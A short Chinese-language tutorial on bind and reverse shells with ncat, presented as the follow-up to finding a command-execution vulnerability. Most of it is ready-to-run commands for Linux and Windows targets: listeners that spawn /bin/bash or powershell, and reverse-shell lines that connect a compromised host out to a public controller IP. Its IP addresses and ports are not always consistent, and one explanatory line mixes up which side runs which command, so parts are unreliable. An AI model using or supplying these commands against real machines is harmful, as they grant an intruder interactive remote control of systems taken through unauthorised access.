正反向shell
在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上
正向shell
应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip
被控端为Linux:
shell
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash
控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口
被控端为Windows
shell
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell
控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口
在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息
如图:
反向shell
应用场景:在被控端口发访问有限制,控制无法直接访问到被控端
由被控端向控制端发起连接,控制端要具备公网地址
被控端为Linux:
shell
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口
被控端为Windows
shell
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell
控制端:ncat -lvp 8888
作用:监听指定的端口
在控制端监听后即可对被控端控制